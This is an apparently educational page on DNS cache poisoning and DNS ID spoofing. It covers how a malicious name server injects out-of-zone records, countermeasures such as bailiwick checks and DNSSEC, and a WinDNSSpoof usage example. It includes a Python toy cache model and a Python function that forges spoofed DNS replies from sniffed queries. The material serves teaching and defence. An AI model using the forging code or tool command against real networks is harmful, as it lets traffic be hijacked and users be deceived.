| Concept | DNS spoofing has occurred when a DNS record handed out by a name server or resolver points to an IP address other than the legitimate one. Let us see how this is done. |
| | A DNS server is normally authoritative only for the records of the zones it owns. To answer a query for a name outside those zones, a recursive resolver has to ask the name servers responsible for that name. Because contacting other servers for every query is not practical, the resolver keeps a cache and stores in it the replies returned by other servers, each for the lifetime (TTL) the reply carried. |
| | When an attacker wants to poison such a cache, the attacker uses a faulty DNS server: this can be the name server for the attacker's own domain, running a hacked DNS server. The server is termed hacked because its records are manipulated to suit the attacker's needs. |
| Attack Methods | The attack methodology goes like this. The attacker sends the target DNS server a request to resolve www.attacker.com (a name in the attacker's domain). As the target server has no record for that name in its cache, it asks the responsible name server, which is the attacker's server. In its reply, the hacked server returns not only the answer but also extra records in the Authority and Additional sections, including manipulated records for names outside the attacker's domain, for example www.targetsite.com pointing at the attacker's IP address. A resolver that does not check whether each returned record belongs to the zone the answering server is actually authoritative for (a bailiwick check, absent from older resolvers) stores all of them. Note that this is not a zone transfer: a zone transfer (AXFR) is a separate operation between authoritative servers, and a correctly configured server refuses it to unauthorised hosts. The cache stays poisoned until the bogus record's TTL expires or the cache is flushed. This way the attacker can make some records point to spoofed addresses, or point them at a host that silently relays to the real server so that all of the victim's traffic passes through the attacker's machine. |
| Countermeasures | Countermeasures include implementing anti-spoofing rules on the border routers of the network. This can be as simple as not allowing anything out with a source IP address not belonging to the network, or anything in with a source IP address belonging to the network (ingress and egress filtering). These rules stop an outside attacker from injecting forged DNS replies that claim to come from an inside server; they do nothing against a malicious name server that answers in its own name, which is countered on the resolver side by the bailiwick check described above, by randomising transaction IDs and source ports, and by DNSSEC validation. |
| | The next level of protection can reside on the access routers. This can also be used to prevent IP spoofing at its most common source. While these filters can be tricky to combine with dynamic IP and 'multi-POP' static IP routing, if implemented well they completely prevent IP spoofing that originates from an access network. |
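The Attack Methods row describes a resolver caching whatever records the attacker's name server hands back. The following Python model is added here as an example; it is not from the original page and not the code of any DNS software. A toy resolver cache learns a constructed reply for www.attacker.com whose Additional section carries a bogus A record for www.targetsite.com, once without and once with a bailiwick check, and the lookup shows the poisoning lasting exactly as long as the bogus record's TTL. The 198.51.100.x addresses are constructed (RFC 5737 documentation range), and the record layout is a simplification of a real DNS message.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class RR:
    """One resource record: owner name, type, data, time to live in seconds."""
    name: str
    rtype: str
    rdata: str
    ttl: int = 3600


@dataclass
class Reply:
    """A reply from an authoritative server, split into its three record sections."""
    answer: list
    authority: list
    additional: list


def in_bailiwick(name, zone):
    """True if name equals zone or lies below it, i.e. the answering server may speak for it."""
    name = name.lower().rstrip(".") + "."
    zone = zone.lower().rstrip(".") + "."
    return name == zone or name.endswith("." + zone)


class ResolverCache:
    """Toy cache of a recursive resolver; entries expire when their TTL runs out."""

    def __init__(self, bailiwick_check):
        self.bailiwick_check = bailiwick_check
        self.store = {}          # (name, type) -> (rdata, expiry time)

    def learn(self, reply, server_zone, now=0):
        """Store the records of a reply from the server authoritative for server_zone.
        With the check on, records for names outside that zone are discarded and returned."""
        rejected = []
        for rr in reply.answer + reply.authority + reply.additional:
            if self.bailiwick_check and not in_bailiwick(rr.name, server_zone):
                rejected.append(rr)
                continue
            self.store[(rr.name.lower(), rr.rtype)] = (rr.rdata, now + rr.ttl)
        return rejected

    def lookup(self, name, rtype, now=0):
        key = (name.lower(), rtype)
        if key not in self.store:
            return None
        rdata, expiry = self.store[key]
        if now >= expiry:
            del self.store[key]   # the poisoning lasts only until the TTL runs out
            return None
        return rdata


def attacker_reply():
    """Constructed reply of the hacked server for attacker.com to a query for www.attacker.com.
    The last Additional record is the bogus one: it speaks for a name outside attacker.com."""
    return Reply(
        answer=[RR("www.attacker.com.", "A", "198.51.100.10")],
        authority=[RR("attacker.com.", "NS", "ns1.attacker.com.")],
        additional=[
            RR("ns1.attacker.com.", "A", "198.51.100.53"),               # legitimate glue
            RR("www.targetsite.com.", "A", "198.51.100.10", ttl=86400),  # poison
        ],
    )


def resolve_target_after_attack(bailiwick_check, now=0):
    """What the resolver answers for www.targetsite.com after caching the attacker's reply."""
    cache = ResolverCache(bailiwick_check)
    cache.learn(attacker_reply(), server_zone="attacker.com.", now=0)
    return cache.lookup("www.targetsite.com.", "A", now)


if __name__ == "__main__":
    print("no check :", resolve_target_after_attack(False))           # attacker's address
    print("check    :", resolve_target_after_attack(True))            # None: never cached
    print("TTL over :", resolve_target_after_attack(False, now=86400))  # None: expired
```

The check is deliberately the plain suffix rule: a record is kept only if its owner name is the server's zone or a subdomain of it, so glue for ns1.attacker.com survives while www.targetsite.com is dropped.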
| WinDNSSpoof | This is a simple tool for spoofing the DNS ID for Windows 9x/2K: it sniffs a victim's DNS query and answers it with a forged reply carrying the same transaction ID, racing the legitimate server. To use it, the user must be able to sniff the traffic of the computer being attacked. On its own it therefore does not work in a switched network; there the victim's traffic must first be redirected through the attacker's host with an ARP cache poisoning tool such as winarp_sk or winarp_mim. |
| | The personal firewall on the attacking machine must be configured to block outgoing DNS traffic (UDP destination port 53), so that queries passing through that machine never reach the legitimate DNS server and the real server cannot answer before WinDNSSpoof does. WinDNSSpoof then spoofs only the replies for the name it was given (-n), while all other DNS traffic is allowed through. The forged replies are addressed at link level with the MAC address given by -g: that of the DNS server, or of the default gateway when the DNS server is in another network. |
| | Usage: wds -h |
| | Example: wds -n www.targetsite.com -i 216.239.39.101 -g 00-00-39-5c-45-3b |
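For the mechanics behind WinDNSSpoof, here is an added Python example; it is not the tool's code and not from the original page. It does the protocol part of DNS ID spoofing: it parses a sniffed DNS query and, if the question is an A query for the target name, builds a reply that reuses the victim's transaction ID and question section and carries an A record for the chosen IP, which corresponds to the tool's -n and -i options; queries for other names or types are left alone. Sniffing, raw-socket transmission and the Ethernet/IP/UDP headers (which the real forgery must copy from the query with addresses and ports swapped, and which is where the -g MAC goes) are not shown. The query bytes are constructed in the block and the IP is the one from the example above.

```python
import struct


def encode_name(name):
    """Encode a dotted hostname as DNS labels (length-prefixed, zero-terminated)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(data, offset):
    """Decode an uncompressed name at offset; return (name with trailing dot, next offset)."""
    labels = []
    while True:
        length = data[offset]
        if length == 0:
            return ".".join(labels) + ".", offset + 1
        if length & 0xC0:
            raise ValueError("compressed name not expected in a question section")
        offset += 1
        labels.append(data[offset:offset + length].decode("ascii"))
        offset += length


def build_query(txid, name, qtype=1):
    """Constructed stand-in for a sniffed victim query: header (RD set, one question) + question."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", qtype, 1)


def parse_query(pkt):
    """Pull transaction ID and question out of a DNS query; None if not a single-question query."""
    txid, flags, qdcount, _, _, _ = struct.unpack(">HHHHHH", pkt[:12])
    if flags & 0x8000 or qdcount != 1:      # QR bit set means this is a response: skip it
        return None
    qname, off = decode_name(pkt, 12)
    qtype, qclass = struct.unpack(">HH", pkt[off:off + 4])
    return {"id": txid, "qname": qname, "qtype": qtype, "qclass": qclass,
            "question": pkt[12:off + 4]}


def forge_response(query_pkt, target_name, spoof_ip, ttl=300):
    """Forge the reply that races the real server, for A/IN queries about target_name only.
    Returns None for anything else, so other DNS traffic is left untouched."""
    q = parse_query(query_pkt)
    if q is None or q["qtype"] != 1 or q["qclass"] != 1:
        return None
    if q["qname"].lower() != target_name.lower().rstrip(".") + ".":
        return None
    # Same ID as the victim's query; flags 0x8180 = response, RD + RA set, NOERROR
    header = struct.pack(">HHHHHH", q["id"], 0x8180, 1, 1, 0, 0)
    rdata = bytes(int(octet) for octet in spoof_ip.split("."))
    # Answer owner name is a compression pointer (0xC00C) back to the question name at offset 12
    answer = b"\xc0\x0c" + struct.pack(">HHIH", 1, 1, ttl, len(rdata)) + rdata
    return header + q["question"] + answer


def parse_response_a(resp):
    """Read back ID, flags, ANCOUNT and the first A record of a reply (to inspect the forgery)."""
    txid, flags, _, ancount, _, _ = struct.unpack(">HHHHHH", resp[:12])
    _, off = decode_name(resp, 12)
    off += 4                                   # skip QTYPE/QCLASS of the echoed question
    rtype, rclass, ttl, rdlen = struct.unpack(">HHIH", resp[off + 2:off + 12])
    ip = ".".join(str(b) for b in resp[off + 12:off + 12 + rdlen])
    return {"id": txid, "flags": flags, "ancount": ancount, "ip": ip, "ttl": ttl}


if __name__ == "__main__":
    sniffed = build_query(0x1A2B, "www.targetsite.com")   # constructed sample query
    forged = forge_response(sniffed, "www.targetsite.com", "216.239.39.101")
    print(parse_response_a(forged))
```

The victim's stub resolver accepts the first reply whose transaction ID, question and (in practice) source port match its outstanding query, which is why a sniffer on the same segment wins the race and why the countermeasures above include randomising IDs and ports and validating with DNSSEC.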
 